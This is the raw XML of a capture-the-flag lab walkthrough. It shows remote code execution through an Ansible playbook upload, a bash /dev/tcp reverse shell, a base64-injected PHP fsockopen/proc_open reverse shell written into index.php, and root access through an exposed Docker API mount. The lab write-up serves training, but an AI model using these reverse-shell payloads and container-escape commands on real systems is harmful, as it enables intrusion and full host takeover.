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SOLUTIONS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ldqgdla3463a"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first step, we need to determine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mw76b9pfr7ur"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739900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.o8zl3qruyhmy" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ports:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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SSH - 22</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HTTP - 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="24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HTTP - 8080</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taking a look at the web application running on port 80:</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13000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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Apparently, there is only a message stating that the server is up. We can take a look at port 8080:</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81300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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the website running on port 8080, we find something interesting — we can register a new account:</w:t>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60700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="75"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registering a new account and logging into the application, we are redirected to the Dashboard:</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90800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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access the Playbook page:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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0" l="0" r="0" t="0"/>
            <wp:docPr id="5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upload a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.yaml</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file to perform tasks automatically using an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ansible playbook</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hyperlink r:id="rId14">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://docs.ansible.com/ansible/2.4/shell_module.html</w:t>
        </w:r>
      </w:hyperlink>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the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell module</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to execute commands remotely on the host:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="24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shell </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">module takes the command name followed by a space-delimited list of arguments. It is almost exactly like the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> module, but it executes the command through a shell on the remote node.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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1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hosts: localhost</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name: Sepiol</w:t>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tasks:</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name: List files and folder directory</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shell: 'ls -la /'</w:t>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register: command_output</w:t>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debug:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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var: command_output.stdout_lines</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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upload the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">read.yaml</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containing the payload above, and with that we will be able to list the root directory:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
      <w:pPr>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color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2743200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="74"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a successful RCE, we can obtain a reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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2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hosts: localhost</w:t>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become: true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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tasks:</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name: ReverseShell</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ansible.builtin.shell: sh -i &gt;&amp; /dev/tcp/&lt;IP-VPN&gt;/4444 0&gt;&amp;1</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args:</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executable: /bin/bash</w:t>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79600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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uploading and executing it, we obtain a shell:</w:t>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25600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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w5mq17qh614m" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrading a simple shell to fully interactive TTYs:</w:t>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30300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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directory, we can retrieve our first flag:</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51000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/mnt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory, we see that the main host is sharing a volume with this Docker host, specifically the DocumentRoot → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html</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file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">index.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> contains the same content as the page running on port 80:</w:t>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12900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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modify this file for testing purposes. I will insert a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">phpinfo()</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function into it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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87500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="60"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view its content on port 80:</w:t>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21000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="58"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One interesting detail is that several functions are disabled, such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system()</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shell_exec()</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eval()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, etc.</w:t>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63700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="76"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we can use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proc_open()</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the website below to generate a reverse shell payload:</w:t>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Online - Reverse Shell Generator</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId24">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.revshells.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">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5562600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="71"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both"/>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4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 $sock=fsockopen("&lt;IP-VPN&gt;",4444);$proc=proc_open("sh", array(0=&gt;$sock, 1=&gt;$sock, 2=&gt;$sock),$pipes); ?&gt;</w:t>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encode it in Base64 so that the payload does not break due to special characters:</w:t>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06500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="59"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need to decode this Base64 and redirect the output to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index.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1168400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="68"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01800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="64"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port 80, we obtain the shell:</w:t>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84300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="73"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spawning a full TTY, we can execute the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -nlapt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to display various network-related data structures for active connections. We will focus on services running locally. We find port 2375:</w:t>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36700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="54"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researching this port, we can easily discover that it corresponds to the Docker API service. With this, we can escalate privileges simply by mounting the main host’s filesystem inside our Docker container. But first, we need to use an available image present on the host.</w:t>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Listing the images:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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docker -H 127.0.0.1:2375 images</w:t>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16000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="62"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any of these images → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">infras01_app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php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mysql</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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I will use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">php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image:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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docker -H 127.0.0.1:2375 run -v /:/mnt --rm -it php:7.4-apache chroot /mnt sh</w:t>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this, we can retrieve our final flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1092200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="61"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943600" cy="1092200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId33" w:type="default"/>
      <w:headerReference r:id="rId34" w:type="first"/>
      <w:headerReference r:id="rId35" w:type="even"/>
      <w:footerReference r:id="rId36" w:type="default"/>
      <w:footerReference r:id="rId37" w:type="first"/>
      <w:footerReference r:id="rId38"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0">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="8"/>
    <w:bookmarkEnd w:id="8"/>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2" name="image8.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image8.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61">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62">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5" name="image4.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image4.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Solutions</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27.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image27.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3.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.revshells.com/" TargetMode="External"/><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24.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.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6.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.ansible.com/ansible/2.4/shell_module.html" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.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7.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VZfhFiwhEI0e6oa1d3xGb6Qz9Q==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLmxkcWdkbGEzNDYzYTIOaC5tdzc2YjlwZnI3dXIyDmgubzh6bDNxcnV5aG15Mg5oLnc1bXExN3FoNjE0bTIOaC4xNzVmNWNzOTR6MG84AHIhMTZZN1hNZWs0d2dRSlpidmplaHlKZlUxbzZuVU5ucmI5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